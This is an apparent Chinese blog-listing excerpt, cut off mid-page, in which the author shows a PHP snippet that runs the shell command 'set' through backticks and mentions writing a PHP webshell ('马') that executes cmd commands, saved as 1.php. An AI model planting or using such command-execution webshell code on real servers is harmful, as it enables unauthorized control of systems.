摘要: <?php $evil=`set`; echo '<pre>'.$evil.'</pre>'; ?> 成功执行set命令,你懂的! 顺手写了个php执行cmd命令的马,保存为1.php <!DOCTYPE html> <html> <head> <title></title> </head> <bo 阅读全文
posted @ 2021-08-11 00:23 流亡青年 阅读(176) 评论(0) 推荐(0) 编辑